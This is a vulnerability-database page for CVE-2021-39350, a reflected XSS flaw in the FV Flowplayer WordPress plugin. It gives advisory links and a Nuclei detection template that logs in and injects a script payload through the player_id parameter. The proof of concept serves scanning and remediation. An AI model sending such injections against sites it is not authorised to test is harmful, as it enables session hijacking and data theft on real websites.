| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2021-39350 | 6 Oct 202120:32 | โ | circl | |
| WordPress ๆไปถ ่ทจ็ซ่ๆฌๆผๆด | 6 Oct 202100:00 | โ | cnnvd | |
| CVE-2021-39350 | 6 Oct 202115:21 | โ | cve | |
| CVE-2021-39350 FV Flowplayer Video Player <= 7.5.0.727 - 7.5.2.727 Reflected Cross-Site Scripting | 6 Oct 202115:21 | โ | cvelist | |
| CVE-2021-39350 | 6 Oct 202116:15 | โ | nvd | |
| CVE-2021-39350 | 6 Oct 202116:15 | โ | osv | |
| WordPress FV Flowplayer Video Player plugin 7.5.0.727 โ 7.5.2.727 - Reflected Cross-Site Scripting (XSS) vulnerability | 5 Oct 202100:00 | โ | patchstack | |
| Cross site scripting | 6 Oct 202116:15 | โ | prion | |
| PT-2021-22556 ยท WordPress ยท Fv Flowplayer Video Player | 6 Oct 202100:00 | โ | ptsecurity | |
| CVE-2021-39350 FV Flowplayer Video Player <= 7.5.0.727 - 7.5.2.727 Reflected Cross-Site Scripting | 6 Oct 202115:21 | โ | vulnrichment |
id: CVE-2021-39350
info:
name: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting
author: gy741
severity: medium
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.
impact: |
Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
- https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-39350
cwe-id: CWE-79
epss-score: 0.02135
epss-percentile: 0.79792
cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: foliovision
product: fv_flowplayer_video_player
framework: wordpress
tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- "<h1>FV Player Stats</h1>"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502205423182bf056c8a2bf42e0323d65ada49f30c666ec3b10ac9270ec40b5929ccb022100b18b947bb1b944db60e93e827047686de8eaddafebb0bd97731279477771a391:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation